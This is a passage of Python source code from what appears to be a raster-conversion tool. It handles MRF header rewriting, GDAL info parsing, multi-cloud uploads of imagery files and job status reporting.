if (self.base.getUserConfiguration.getValue(CCFG_LAMBDA_INVOCATION_ERR)):
self._isErrorDetected = True
return False
return True
class RasterAssociates(object):
RasterAuxExtensions = ['.lrc', '.idx', '.pjg', '.ppng', '.pft', '.pjp',
'.pzp', '.tif.cog.pzp', '.tif.cog.idx', '.tif.cogtiff.aux.xml']
def __init__(self):
self._info = {}
def _stripExtensions(self, relatedExts):
return ';'.join([x.strip() for x in relatedExts.split(';') if x.strip()])
# relatedExts can be a ';' delimited list.
def addRelatedExtensions(self, primaryExt, relatedExts):
if (not primaryExt or
not primaryExt.strip() or
not relatedExts):
return False
for p in primaryExt.split(';'):
p = p.strip()
if (not p):
continue
if (p in self._info):
self._info[p] += ';{}'.format(
self._stripExtensions(relatedExts))
continue
self._info[p] = self._stripExtensions(relatedExts)
return True
@staticmethod
def removeRasterProxyAncillaryFiles(inputPath):
# remove ancillary extension files that are no longer required for (rasterproxy) files on the client side.
refBasePath = inputPath[:-len(CONST_OUTPUT_EXT)]
errorEntries = []
for ext in RasterAssociates.RasterAuxExtensions:
try:
path = refBasePath + ext
if (os.path.exists(path)):
if (path.endswith(COGTIFFAuxFile)):
os.rename(path, path.replace(CloudOGTIFFExt, ''))
continue
os.remove(path)
except Exception as e:
errorEntries.append('{}'.format(str(e)))
return errorEntries
@staticmethod
def findExtension(path):
if (not path):
return False
pos = path.rfind('.')
ext = None
while(pos != -1):
ext = path[pos + 1:]
pos = path[:pos].rfind('.')
return ext
def findPrimaryExtension(self, relatedExt):
_relatedExt = self.findExtension(relatedExt)
if (not _relatedExt):
return False
for primaryExt in self._info:
if (self._info[primaryExt].find(_relatedExt) != -1):
splt = self._info[primaryExt].split(';')
if (_relatedExt in splt):
return primaryExt
return None
def getInfo(self):
return self._info
class Base(object):
# log status types enums
const_general_text = 0
const_warning_text = 1
const_critical_text = 2
const_status_text = 3
# ends
def __init__(self, msgHandler=None, msgCallback=None, userConfig=None):
self._m_log = msgHandler
self._m_msg_callback = msgCallback
self._m_user_config = userConfig
self._lastMsg = ''
if (self._m_msg_callback):
if (self._m_log):
self._m_log.isPrint = False
def init(self):
self.hashInfo = {}
self.timedInfo = {'files': []}
self._modifiedProxies = []
return True
def message(self, msg, status=const_general_text):
if (msg):
self._lastMsg = msg
if (self._m_log):
self._m_log.Message(msg, status)
if (self._m_msg_callback):
self._m_msg_callback(msg, status)
def isLinux(self):
return sys.platform.lower().startswith(('linux', 'darwin'))
def convertToTokenPath(self, inputPath, direction=CS3STORAGE_IN):
if (not inputPath):
return None
tokenPath = None
if (direction == CS3STORAGE_IN):
if (not self.getBooleanValue(self.getUserConfiguration.getValue(UseToken))):
return tokenPath
else:
if (not self.getBooleanValue(self.getUserConfiguration.getValue(UseTokenOnOuput))):
return tokenPath
if (self.getBooleanValue(self.getUserConfiguration.getValue('iss3' if direction == CS3STORAGE_IN else CCLOUD_UPLOAD))):
cloudHandler = self.getSecuredCloudHandlerPrefix(direction)
if (not cloudHandler):
return None
currPrefix = self.getUserConfiguration.getValue(
CIN_S3_PREFIX if direction == CS3STORAGE_IN else COUT_VSICURL_PREFIX, False)
if (direction == CS3STORAGE_OUT):
currPrefix = currPrefix[:currPrefix.find(
_rpt._header['output'])]
tokenPath = inputPath.replace(currPrefix,
'/{}/{}/'.format(cloudHandler, self.getUserConfiguration.getValue('In_S3_Bucket' if direction == CS3STORAGE_IN else 'Out_S3_Bucket', False)))
return tokenPath
def copyBinaryToTmp(self, binarySrc, binaryDst):
if (not os.path.exists(binaryDst)):
try:
shutil.copyfile(binarySrc, binaryDst)
os.chmod(binaryDst, 0o777) # set (rwx) to make lambda work.
self.message('**LAMBDA** Copied -> {}'.format(binarySrc))
except Exception as e:
self.message(str(e), self.const_critical_text)
return False
return True
def convertToForwardSlash(self, input, endSlash=True):
if (not input):
return None
_input = input.replace('\\', '/').strip()
if (not endSlash):
return _input
f, e = os.path.splitext(_input)
if (len(e) > 0):
if (filterPaths(_input, self.getUserConfiguration.getValue(CCFG_RASTERS_NODE) + ['csv', 'CSV'])):
return _input
if (_input.lower().startswith('http://') or
_input.lower().startswith('https://')):
return _input
if (not _input.endswith('/')):
_input += '/'
return _input
def insertUserTextToOutputPath(self, path, text, pos):
if (not path):
return None
if (not text):
return path
try:
_pos = int(pos)
except BaseException:
_pos = CHASH_DEF_INSERT_POS
_path = path.split('/')
_pos -= 1
lenPath = len(_path)
if (_pos >= lenPath):
_pos = lenPath - 1
p = os.path.dirname(path)
if (p not in self.hashInfo):
if (text == CHASH_DEF_CHAR):
text = binascii.hexlify(os.urandom(4))
else:
m = hashlib.md5()
m.update('{}/{}'.format(p, text))
text = m.hexdigest()
text = '{}_@'.format(text[:8]) # take only the fist 8 chars
self.hashInfo[p] = text
else:
text = self.hashInfo[p]
_path.insert(_pos, text)
return '/'.join(_path)
def urlEncode(self, url):
if (not url):
return ''
_url = url.strip().replace('\\', '/')
_storePaths = []
for path in _url.split('/'):
if (path.find(':') != -1):
_storePaths.append(path)
continue
data = {'url': path}
encoded = urlencode(data)
_storePaths.append(encoded.split('=')[1])
return '/'.join(_storePaths)
def getBooleanValue(self, value): # helper function
if (value is None):
return False
if (isinstance(value, bool)):
return value
val = value
if (not isinstance(val, str)):
val = str(val)
val = val.lower()
if val in ['true', 'yes', 't', '1', 'y']:
return True
return False
@property
def getUserConfiguration(self):
return self._m_user_config
@property
def getMessageHandler(self):
return self._m_log
@property
def getMessageCallback(self):
return self._m_msg_callback
def close(self):
if (self._m_log):
if (not CRUN_IN_AWSLAMBDA):
usrLogFolder = self.getUserConfiguration.getValue(CFGLogPath)
if (usrLogFolder is not None):
self._m_log.SetLogFolder(usrLogFolder)
# persist information/errors collected.
self._m_log.WriteLog('#all')
def renameMetaFileToMatchRasterExtension(self, metaFile):
updatedMetaFile = metaFile
if (self.getUserConfiguration and
not self.getBooleanValue(self.getUserConfiguration.getValue('KeepExtension'))):
rasterExtension = RasterAssociates().findExtension(updatedMetaFile)
if (not rasterExtension):
return metaFile
inputExtensions = rasterExtension.split('.')
firstExtension = inputExtensions[0]
# no changes to extension if the input has only one extension.
if (len(inputExtensions) == 1):
return metaFile
if (True in [firstExtension.endswith(x) for x in self.getUserConfiguration.getValue(CCFG_RASTERS_NODE)]):
updatedMetaFile = updatedMetaFile.replace(
'.{}'.format(firstExtension), '.mrf')
return updatedMetaFile
def _isRasterProxyFormat(self, uFormat):
if (not uFormat):
return False
rpFormat = self.getUserConfiguration.getValue('rpformat')
return rpFormat == uFormat.lower()
def copyMetadataToClonePath(self, sourcePath):
if (not self.getUserConfiguration):
return False
_clonePath = self.getUserConfiguration.getValue(CCLONE_PATH, False)
if (not _clonePath):
return True # not an error.
if (self._isRasterProxyFormat('csv')):
return True # not an error.
presentMetaLocation = self.getUserConfiguration.getValue(
CCFG_PRIVATE_OUTPUT, False)
if (self.getUserConfiguration.getValue(CTEMPOUTPUT) and
self.getBooleanValue(self.getUserConfiguration.getValue(CCLOUD_UPLOAD))):
presentMetaLocation = self.getUserConfiguration.getValue(
CTEMPOUTPUT, False)
_cloneDstFile = sourcePath.replace(presentMetaLocation, _clonePath)
_cloneDirs = os.path.dirname(_cloneDstFile)
try:
if (not os.path.exists(_cloneDirs)):
makedirs(_cloneDirs)
if (sourcePath != _cloneDstFile):
shutil.copyfile(sourcePath, _cloneDstFile)
except Exception as e:
self.message(str(e), self.const_critical_text)
return False
return True
def S3Upl(self, input_file, user_args, **kwargs):
global _rpt
internal_err_msg = 'Internal error at [S3Upl]'
if (not self._m_user_config or
(user_args and
not isinstance(user_args, dict))):
self.message(internal_err_msg, self.const_critical_text)
return False
_source_path = None
if (_rpt):
_source_path = getSourcePathUsingTempOutput(input_file)
if (_source_path):
_ret_val = _rpt.getRecordStatus(_source_path, CRPT_UPLOADED)
if (_ret_val == CRPT_YES):
return True
ret_buff = []
upload_cloud_type = self._m_user_config.getValue(COUT_CLOUD_TYPE, True)
if (upload_cloud_type == CCLOUD_AMAZON):
if (S3_storage is None): # globally declared: S3_storage
self.message(internal_err_msg, self.const_critical_text)
return False
_single_upload = _include_subs = False # def
if (user_args):
if (CSIN_UPL in user_args):
_single_upload = self.getBooleanValue(user_args[CSIN_UPL])
if (CINC_SUB in user_args):
_include_subs = self.getBooleanValue(user_args[CINC_SUB])
ret_buff = S3_storage.upload_group(
input_file, single_upload=_single_upload, include_subs=_include_subs)
if (len(ret_buff) == 0):
return False
elif (upload_cloud_type == CCLOUD_AZURE):
if(azure_storage is None):
self.message(internal_err_msg, self.const_critical_text)
return False
properties = {
CTEMPOUTPUT: self._m_user_config.getValue(CTEMPOUTPUT, False),
'access': self._m_user_config.getValue(COUT_AZURE_ACCESS, True),
CTEMPINPUT: self._m_user_config.getValue(CTEMPINPUT, False)
}
if (TarGz in kwargs):
properties[TarGz] = kwargs[TarGz]
_input_file = input_file.replace('\\', '/')
(p, n) = os.path.split(_input_file)
indx = n.find('.')
file_name_prefix = n
if (indx >= 0):
file_name_prefix = file_name_prefix[:indx]
input_folder = os.path.dirname(_input_file)
for r, d, f in os.walk(input_folder):
r = r.replace('\\', '/')
if (r == input_folder):
for _file in f:
if (_file.startswith('{}.'.format(file_name_prefix))):
file_to_upload = os.path.join(r, _file)
if (azure_storage.upload(
file_to_upload,
self._m_user_config.getValue(
COUT_AZURE_CONTAINER, False),
self._m_user_config.getValue(
CCFG_PRIVATE_OUTPUT, False),
properties, name=_source_path, method=TimeIt.Upload, store=self
)):
ret_buff.append(file_to_upload)
break
elif (upload_cloud_type == Store.TypeGoogle):
if(google_storage is None):
self.message(internal_err_msg, self.const_critical_text)
return False
properties = {
CTEMPOUTPUT: self._m_user_config.getValue(CTEMPOUTPUT, False),
'access': self._m_user_config.getValue(COUT_AZURE_ACCESS, True)
}
_input_file = input_file.replace('\\', '/')
(p, n) = os.path.split(_input_file)
indx = n.find('.')
file_name_prefix = n
if (indx >= 0):
file_name_prefix = file_name_prefix[:indx]
input_folder = os.path.dirname(_input_file)
for r, d, f in os.walk(input_folder):
r = r.replace('\\', '/')
if (r == input_folder):
for _file in f:
if (_file.startswith('{}.'.format(file_name_prefix))):
file_to_upload = self.convertToForwardSlash(
os.path.join(r, _file), False)
if (google_storage.upload(
file_to_upload,
self._m_user_config.getValue(
COUT_GOOGLE_BUCKET, False),
self._m_user_config.getValue(
CCFG_PRIVATE_OUTPUT, False),
properties
)):
ret_buff.append(file_to_upload)
break
if (CS3_MSG_DETAIL):
self.message('Following file(s) uploaded to ({})'.format(
upload_cloud_type.capitalize()))
[self.message('{}'.format(f)) for f in ret_buff]
if (user_args):
if (USR_ARG_DEL in user_args):
if (user_args[USR_ARG_DEL] and
user_args[USR_ARG_DEL]):
isProxyCSV = False
rpt = self.getUserConfiguration.getValue(CPRT_HANDLER)
if (rpt):
proxyPath = rpt._header.get(CRASTERPROXYPATH)
tmpOutput = rpt._header.get(CTEMPOUTPUT)
if (proxyPath and
tmpOutput and
proxyPath[-4:].lower().endswith('.csv')):
isProxyCSV = True
for f in ret_buff:
try:
_is_remove = True
if (til):
if (til.fileTILRelated(f)):
_is_remove = False
if (_is_remove):
try:
if (isProxyCSV):
if (f.lower().endswith('.aux.xml')):
dstAuxPath = os.path.join(os.path.dirname(proxyPath), os.path.basename(f))
self.message('Copying {} -> {}'.format(f, dstAuxPath))
shutil.copyfile(f, dstAuxPath) # GH 104
os.remove(f)
except BaseException:
time.sleep(CDEL_DELAY_SECS)
os.remove(f)
self.message('[Del] %s' % (f))
except Exception as e:
self.message('[Del] Err. (%s)' %
(str(e)), self.const_critical_text)
if (ret_buff):
Input = 'input'
setUploadRecordStatus(
kwargs[Input] if kwargs and Input in kwargs else input_file, CRPT_YES)
return (len(ret_buff) > 0)
def getSecuredCloudHandlerPrefix(self, direction):
warningMsg = 'getSecuredCloudHandlerPrefix/{} is false'.format(
'-usetoken' if direction == CS3STORAGE_IN else 'internal/usetokenonoutput')
if (direction == CS3STORAGE_IN and
not self.getBooleanValue(self.getUserConfiguration.getValue(UseToken))):
self.message(warningMsg, self.const_warning_text)
return None
if (direction == CS3STORAGE_OUT and
not self.getBooleanValue(self.getUserConfiguration.getValue(UseTokenOnOuput))):
self.message(warningMsg, self.const_warning_text)
return None
storageType = self.getUserConfiguration.getValue(
COUT_CLOUD_TYPE if direction == CS3STORAGE_OUT else CIN_CLOUD_TYPE, True)
prefix = 'vsis3'
usingOSSDomain = self.getUserConfiguration.getValue('{}oss'.format(
'in' if direction == CS3STORAGE_IN else 'out')) # alibaba?
if (usingOSSDomain):
prefix = 'vsioss'
elif (storageType == CCLOUD_AZURE):
prefix = 'vsiaz'
elif (storageType == CCLOUD_GOOGLE):
prefix = 'vsigs'
return prefix
class GDALInfo(object):
CGDAL_INFO_EXE = 'gdalinfo'
CW = 'width'
CH = 'height'
def __init__(self, base, msgCallback=None):
self._GDALPath = None
self._GDALInfo = []
self._propertyNames = [self.CW, self.CH]
self._base = base
self._m_msg_callback = msgCallback
def init(self, GDALPath):
if (not GDALPath):
return False
if (self._base and
not isinstance(self._base, Base)):
return False
if (not self._base.isLinux()):
self.CGDAL_INFO_EXE += CEXEEXT
self._GDALPath = GDALPath.replace('\\', '/')
if (not self._GDALPath.endswith('/{}'.format(self.CGDAL_INFO_EXE))):
self._GDALPath = os.path.join(
self._GDALPath, self.CGDAL_INFO_EXE).replace('\\', '/')
# check for path existence / e.t.c
if (not os.path.exists(self._GDALPath)):
self.message('Invalid GDALInfo/Path ({})'.format(self._GDALPath),
self._base.const_critical_text)
return False
if (CRUN_IN_AWSLAMBDA):
_gdalinfo = '/tmp/{}'.format(self.CGDAL_INFO_EXE)
if (not self._base.copyBinaryToTmp(self._GDALPath, _gdalinfo)):
return False
self._GDALPath = _gdalinfo
for p in self._propertyNames: # init-property names
setattr(self, p, None)
return True
def process(self, input):
if (not self._GDALPath):
self.message('Not initialized!', self._base.const_critical_text)
return False
if (not input): # invalid input
return False
args = [self._GDALPath]
args.append('"{}"'.format(input))
self.message('Using GDALInfo ({})..'.format(
input), self._base.const_general_text)
return self._call_external(args)
def message(self, msg, status=0):
self._m_msg_callback(
msg, status) if self._m_msg_callback else self._base.message(msg, status)
@property
def bandInfo(self):
if (not len(self._GDALInfo)):
return None
retInfo = []
for v in self._GDALInfo:
if (isinstance(v, bytes)):
v = bytes.decode(v)
if (v.startswith('Band ')):
retInfo.append(v)
return retInfo
@property
def pyramidLevels(self):
if (not self.width or
not self.height):
return False # fn/process not called.
_max = max(self.width, self.height)
_BS = CCFG_BLOCK_SIZE # def (512)
if (self._base.getUserConfiguration):
__BS = self._base.getUserConfiguration.getValue('BlockSize')
if (__BS):
try:
_BS = int(__BS) # catch invalid val types
except BaseException:
pass
_value = (_max / _BS)
if (_value <= 0):
return ''
_levels = int(2 ** math.ceil(math.log(_value, 2)))
CDEFPYRAMID_LEV = '2'
_steps = ''
while (_levels >= 2):
_steps = '{} {}'.format(_levels, _steps)
_levels >>= 1
_steps = _steps.strip()
if (not _steps):
_steps = CDEFPYRAMID_LEV
self.message('<PyramidFactor> set to ({})'.format(
_steps), self._base.const_general_text)
return _steps
def _call_external(self, args):
p = subprocess.Popen(' '.join(args), shell=True,
stdout=subprocess.PIPE)
message = '/'
CSIZE_PREFIX = b'Size is'
while (message):
message = p.stdout.readline()
if (message):
_strip = message.strip()
if (_strip.find(CSIZE_PREFIX) != -1):
wh = _strip.split(CSIZE_PREFIX)
if (len(wh) > 1):
wh = wh[1].split(b',')
if (self.CW in self._propertyNames):
self.width = int(wh[0].strip())
if (self.CH in self._propertyNames):
self.height = int(wh[1].strip())
self._GDALInfo.append(_strip)
return len(self._GDALInfo) > 0
class UpdateMRF:
def __init__(self, base=None):
self._mode = \
self._cachePath = \
self._input = \
self._output = \
self._homePath = \
self._outputURLPrefix = None
self._base = base
def init(self, input, output, mode=None,
cachePath=None, homePath=None, outputURLPrefix=None):
if (not input or
not output):
return False
if (not os.path.exists(output)):
try:
makedirs(output)
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
if (input.rfind('.') == -1):
return False
if (self._base and
not isinstance(self._base, Base)):
return False
self._or_mode = self._base.getUserConfiguration.getValue(
'Mode') # mode/output
if (not self._or_mode):
self._base.message('UpdateMRF> (Mode) not defined.',
self._base.const_critical_text)
return False
_type = self._or_mode.split('_')
if (len(_type) > 1):
self._or_mode = _type[0]
# to trap modes (cachingmrf/clonemrf).
if (self._or_mode.endswith('mrf')):
self._or_mode = 'mrf'
self._mode = mode
self._input = self._convertToForwardSlash(input)
self._output = self._convertToForwardSlash(output)
self._cachePath = self._convertToForwardSlash(cachePath)
self._homePath = self._convertToForwardSlash(homePath)
self._outputURLPrefix = self._convertToForwardSlash(outputURLPrefix)
return True
def _convertToForwardSlash(self, input):
if (not input):
return None
return input.replace('\\', '/')
def copyInputMRFFilesToOutput(self, doUpdate=True):
if (not self._input or
not self._output):
if (self._base):
self._base.message('Not initialized!',
self._base.const_critical_text)
return False
_prefix = self._input[:self._input.rfind('.')]
input_folder = os.path.dirname(self._input)
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
if (_resumeReporter and
CRESUME_HDR_OUTPUT not in _resumeReporter._header):
_resumeReporter = None
rpformat = self._base.getUserConfiguration.getValue('rpformat')
rpCSV = self._base._isRasterProxyFormat(rpformat)
for r, d, f in os.walk(input_folder):
r = r.replace('\\', '/')
if (r == input_folder):
for _file in f:
if (True in [_file.lower().endswith(x) for x in RasterAssociates.RasterAuxExtensions]):
continue
_mk_path = r + '/' + _file
if (_mk_path.startswith(_prefix)):
try:
_output_path = self._output
if (self._homePath):
userInput = self._homePath
if (_resumeReporter):
userInput = _resumeReporter._header[CRESUME_HDR_OUTPUT]
_output_path = os.path.join(self._output, os.path.dirname(self._input.replace(
self._homePath if self._input.startswith(self._homePath) else userInput, ''))) #
if (not os.path.exists(_output_path)):
if (not rpCSV):
makedirs(_output_path)
_mk_copy_path = os.path.join(
_output_path, _file).replace('\\', '/')
if (_file.lower() == os.path.basename(self._input).lower()):
if (doUpdate):
if (not self.update(_mk_copy_path)):
if (self._base):
self._base.message('Updating ({}) failed!'.format(
_mk_copy_path), self._base.const_critical_text)
continue
if (_mk_path.lower().endswith(self._or_mode) or
_mk_path.lower().endswith('.ovr')):
continue
if (not os.path.exists(_mk_copy_path)):
if (not rpCSV):
shutil.copy(_mk_path, _mk_copy_path)
except Exception as e:
if (self._base):
self._base.message(
'-rasterproxypath/{}'.format(str(e)), self._base.const_critical_text)
continue
def update(self, output, **kwargs):
try:
_CCACHE_EXT = '.mrf_cache'
_CDOC_ROOT = 'MRF_META'
comp_val = None # for (splitmrf)
isURLInput = self._input.lower().startswith(
'http://') or self._input.lower().startswith('https://')
baseURL = self._input
if (isURLInput):
baseURL = self._input.split('?')[0]
baseURL = os.path.basename(baseURL)
doc = minidom.parse(
self._input if not isURLInput else urlopen(self._input))
_rasterSource = self._input
isCOGTIFF = self._base.getUserConfiguration.getValue('cog')
autoCreateRasterProxy = False
if (self._mode):
autoCreateRasterProxy = not self._mode.endswith('mrf')
if (self._outputURLPrefix and # -cloudupload?
self._homePath):
usrPath = self._base.getUserConfiguration.getValue(
CUSR_TEXT_IN_PATH, False)
# default insert pos (sub-folder loc) for user text in output path
usrPathPos = CHASH_DEF_INSERT_POS
if (usrPath):
(usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
_rasterSource = '{}{}'.format(
self._outputURLPrefix, _rasterSource.replace(self._homePath, ''))
if (_rasterSource.startswith('/vsicurl/')):
isOutContainerSAS = False
if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseTokenOnOuput)) and
not self._base.getBooleanValue(self._base.getUserConfiguration.getValue('iss3'))):
cloudHandler = self._base.getSecuredCloudHandlerPrefix(
CS3STORAGE_OUT)
if (cloudHandler):
outContainer = self._base.getUserConfiguration.getValue(
'Out_S3_Bucket', False)
proxyURL = self._base.getUserConfiguration.getValue(
CCLONE_PATH, False)
proxySubfolders = output.replace(proxyURL, '')
proxyFileURL = os.path.join(self._base.getUserConfiguration.getValue(
CCFG_PRIVATE_OUTPUT, False), proxySubfolders)
isOutContainerSAS = (self._base.getUserConfiguration.getValue(COUT_CLOUD_TYPE, True) == CCLOUD_AZURE and
azure_storage is not None and
azure_storage._SASToken is not None)
_rasterSource = '/vsicurl/{}'.format(azure_storage._blob_service.url).replace('?', format('/{}?'.format(
proxyFileURL))) if isOutContainerSAS else '/{}/{}/{}'.format(cloudHandler, outContainer, proxyFileURL)
if (not isOutContainerSAS):
_rasterSource = self._base.urlEncode(_rasterSource)
if (usrPath):
_idx = _rasterSource.find(
self._base.getUserConfiguration.getValue(CCFG_PRIVATE_OUTPUT, False))
if (_idx != -1):
suffix = self._base.insertUserTextToOutputPath(
_rasterSource[_idx:], usrPath, usrPathPos)
_rasterSource = _rasterSource[:_idx] + suffix
# if -tempoutput is set, readjust the CachedSource/Source path to point to -output.
else:
if (self._base.getUserConfiguration.getValue(CTEMPOUTPUT) or
autoCreateRasterProxy):
_output = self._base.getUserConfiguration.getValue(
CCFG_PRIVATE_OUTPUT)
if (_output):
_rasterSource = _rasterSource.replace(
self._homePath, _output)
nodeMeta = doc.getElementsByTagName(_CDOC_ROOT)
nodeRaster = doc.getElementsByTagName('Raster')
if (not nodeMeta or
not nodeRaster):
raise Exception('Err. Invalid header')
cachedNode = doc.getElementsByTagName('CachedSource')
if (not cachedNode):
cachedNode.append(doc.createElement('CachedSource'))
nodeSource = doc.createElement('Source')
azSAS = self._base.getUserConfiguration.getValue(
CFGAZSASW, False)
trueInput = _rasterSource
if ('trueInput' in kwargs):
trueInput = kwargs['trueInput']
nodeSource.appendChild(doc.createTextNode(
'{}{}'.format(trueInput, '?' + azSAS if azSAS else '')))
cachedNode[0].appendChild(nodeSource)
nodeMeta[0].insertBefore(cachedNode[0], nodeRaster[0])
if (self._mode):
if (self._mode.startswith('mrf') or
self._mode == 'clonemrf'):
node = doc.getElementsByTagName('Source')
if (node):
node[0].setAttribute('clone', 'true')
elif(self._mode == 'splitmrf'):
CONST_LBL_COMP = 'Compression'
node = doc.getElementsByTagName(CONST_LBL_COMP)
if (node):
if (node[0].hasChildNodes()):
comp_val = node[0].firstChild.nodeValue.lower()
cache_output = self._base.convertToForwardSlash(
os.path.dirname(output))
# make sure the 'CacheSource/Source' is pointing at the processed raster output
if (autoCreateRasterProxy):
node = doc.getElementsByTagName('Source')
if (node):
sourceVal = _rasterSource
if (not sourceVal.endswith(baseURL)):
sourceVal = os.path.join(
_rasterSource, baseURL.split(CloudOGTIFFExt)[0])
node[0].firstChild.nodeValue = sourceVal
# ends
if (self._cachePath):
cache_output = self._cachePath
if (not self._base.getUserConfiguration):
raise Exception('Err/Internal. UpdateMRF/getUserConfiguration')
cacheSubFolders = ''
if (self._cachePath):
cacheSubFolders = self._base.convertToForwardSlash(os.path.dirname(
output)).replace(self._output if self._cachePath else self._homePath, '')
(f, ext) = os.path.splitext(baseURL)
mkCachePath = '{}{}{}{}'.format(
cache_output, cacheSubFolders, f, _CCACHE_EXT)
if (mkCachePath.find(':') == -1):
# Get abs path in case the -output was relative for cache to function properly.
mkCachePath = os.path.abspath(mkCachePath)
mkCachePath = mkCachePath.replace('\\', '/')
rep_data_file = rep_indx_file = mkCachePath
nodeData = nodeIndex = None
if (comp_val):
extensions_lup = {
'lerc': {'data': '.lrc', 'index': '.idx'}
}
useTokenPath = self._base.convertToTokenPath(doc.getElementsByTagName('Source')[0].firstChild.nodeValue,
CS3STORAGE_OUT if self._base.getBooleanValue(self._base.getUserConfiguration.getValue(CCLOUD_UPLOAD)) else CS3STORAGE_IN)
if (useTokenPath is not None):
doc.getElementsByTagName(
'Source')[0].firstChild.nodeValue = useTokenPath
nodeData = nodeRaster[0].getElementsByTagName('DataFile')
if (not nodeData):
nodeData.append(doc.createElement('DataFile'))
nodeData[0].appendChild(doc.createTextNode(''))
nodeRaster[0].appendChild(nodeData[0])
nodeIndex = nodeRaster[0].getElementsByTagName('IndexFile')
if (not nodeIndex):
nodeIndex.append(doc.createElement('IndexFile'))
nodeIndex[0].appendChild(doc.createTextNode(''))
nodeRaster[0].appendChild(nodeIndex[0])
if (nodeData):
if (comp_val and
comp_val in extensions_lup):
rep_data_file = rep_data_file.replace(
_CCACHE_EXT, extensions_lup[comp_val]['data'])
nodeData[0].firstChild.nodeValue = rep_data_file
if (nodeIndex):
if (comp_val and
comp_val in extensions_lup):
rep_indx_file = rep_indx_file.replace(
_CCACHE_EXT, extensions_lup[comp_val]['index'])
nodeIndex[0].firstChild.nodeValue = rep_indx_file
# GDAL mrf driver can't handle XML entity names.
_mrfBody = doc.toxml().replace('"', '"')
_indx = _mrfBody.find('<{}>'.format(_CDOC_ROOT))
if (_indx == -1):
raise Exception('Err. Invalid MRF/header')
_mrfBody = _mrfBody[_indx:]
rpCSV = self._base._isRasterProxyFormat(
self._base.getUserConfiguration.getValue('rpformat'))
if (rpCSV):
_mrfBody = _mrfBody.replace('\n', '') + '\n'
self._base._modifiedProxies.append(_mrfBody)
if (self._or_mode == 'rasterproxy' or
self._base.getUserConfiguration.getValue(CCLONE_PATH)): # if using the template 'CreateRasterProxy', keep only the .csv file.
try:
if (not self._base._isRasterProxyFormat('csv')):
os.remove(self._input)
os.remove('{}.aux.xml'.format(self._input))
except BaseException as e:
pass # not an error
else:
with open(output.split(CloudOGTIFFExt)[0] if isCOGTIFF else output, 'w') as c:
c.write(_mrfBody)
if (isCOGTIFF):
os.remove(output)
except Exception as e:
if (self._base):
self._base.message('Updating ({}) was not successful!\nPlease make sure the input is (MRF) format.\n{}'.format(
output, str(e)), self._base.const_critical_text)
return False
return True
class Report:
CHEADER_PREFIX = '#'
CJOB_EXT = '.orjob'
CVSCHAR = '\t'
CRPT_URL_TRUENAME = 'URL_NAME'
CHDR_TEMPOUTPUT = CTEMPOUTPUT
CHDR_CLOUDUPLOAD = 'cloudupload'
CHDR_CLOUD_DWNLOAD = 'clouddownload'
CHDR_MODE = 'mode'
CHDR_OP = 'op'
# Delay in secs before the partial status of the .orjob gets written to the local disk.
SnapshotDelay = 20
def __init__(self, base):
self._input_list = []
self._input_list_info = {}
self._input_list_info_ex = {}
self._header = {
'version': '{}/{}'.format(Application.__program_ver__, Application.__program_date__)
}
self._base = base
self._isInputHTTP = False
self._m_rasterAssociates = RasterAssociates()
# To copy files required by raster formats to the primary raster copy location (-tempinput?) before any conversion could take place.
self._m_rasterAssociates.addRelatedExtensions('img;IMG', 'ige;IGE')
# certain associated files need to be present alongside rasters for GDAL to work successfully.
self._m_rasterAssociates.addRelatedExtensions(
'ntf;NTF;tif;TIF', 'RPB;rpb')
# status report for these extensions will be skipped. Case insensitive comparison.
self._m_skipExtentions = ('til.ovr')
self._rptPreviousTime = datetime.now()
def init(self, report_file, root=None):
if (not self._base or
not isinstance(self._base, Base)):
return False
if (not report_file):
return False
if (not report_file.lower().endswith(self.CJOB_EXT)):
return False
try:
folder = os.path.dirname(os.path.abspath(report_file))
if (not os.path.exists(folder)):
os.makedirs(folder)
except Exception as e:
self._base.message('init failure with path ({}) at (Reporter)'.format(
folder), self._base.const_critical_text)
return False
self._report_file = report_file
if (root):
f, e = os.path.splitext(root)
_root = root.replace('\\', '/')
if ((self._base.getUserConfiguration and
self._base.getUserConfiguration.getValue('Mode') == BundleMaker.CMODE)):
self._input_list.append(_root)
return True
_root = self._base.convertToForwardSlash(_root, True)
# first element in the report is the -input path to source
self._input_list.append(_root)
return True
@property
def header(self):
return self._header
@header.setter
def header(self, value):
self._header = value
def getRecordStatus(self, input, type): # returns (true or false)
if (input is None or
type is None):
return CRPT_UNDEFINED
try:
return (self._input_list_info[input][type.upper()])
except BaseException:
pass
return CRPT_UNDEFINED
@staticmethod
def getUniqueFileName():
_dt = datetime.now()
_prefix = 'OR'
_jobName = _prefix + "_%04d%02d%02dT%02d%02d%02d%06d" % (_dt.year, _dt.month, _dt.day,
_dt.hour, _dt.minute, _dt.second, _dt.microsecond)
return _jobName
def _createSnapshot(self): # take snapshot/updates .job file partially.
rptCurrentTime = datetime.now()
rptDuration = (rptCurrentTime - self._rptPreviousTime).total_seconds()
if (rptDuration > self.SnapshotDelay):
result = self.write()
self._base.message(
'Orjob/Snapshot/Status>{}@{}'.format(str(result), str(str(datetime.utcnow()))))
self._rptPreviousTime = rptCurrentTime
# input is the (src) path name which is case sensitive.
def updateRecordStatus(self, input, type, value):
if (input is None or
type is None or
value is None):
return False
self._createSnapshot()
_type = type.upper()
_value = value.lower()
if (-1 != input.find('X-Amz-Credential=')):
if (input in self._input_list_info):
self._input_list_info[input][_type] = _value
return True
_input = input.strip().split('?')[0]
if (_input.lower().endswith(self._m_skipExtentions)):
return True # not flagged as an err
if (CTEMPINPUT in self._header):
if (_input.startswith(self._header[CTEMPINPUT])):
_input = _input.replace(self._header[CTEMPINPUT], self.root)
(p, e) = os.path.split(_input)
for _k in self._input_list_info:
if (_k.startswith(p)):
if (self.CRPT_URL_TRUENAME in self._input_list_info[_k]):
if (self._input_list_info[_k][self.CRPT_URL_TRUENAME] == e):
_input = _k
break
_path = os.path.dirname(_input.replace('\\', '/'))
if (not _path.endswith('/')):
_path += '/'
if (CRESUME_HDR_OUTPUT in self._header and
_path == self._header[CRESUME_HDR_OUTPUT]):
_input = _input.replace(_path, self._header[CRESUME_HDR_INPUT])
(p, e) = os.path.splitext(_input)
while(e):
_input = '{}{}'.format(p, e)
if (_input in self._input_list_info):
break
(p, e) = os.path.splitext(p)
if (_type not in [CRPT_COPIED, CRPT_PROCESSED, CRPT_UPLOADED]):
self._base.message('Invalid type ({}) at (Reporter)'.format(
type), self._base.const_critical_text)
return False
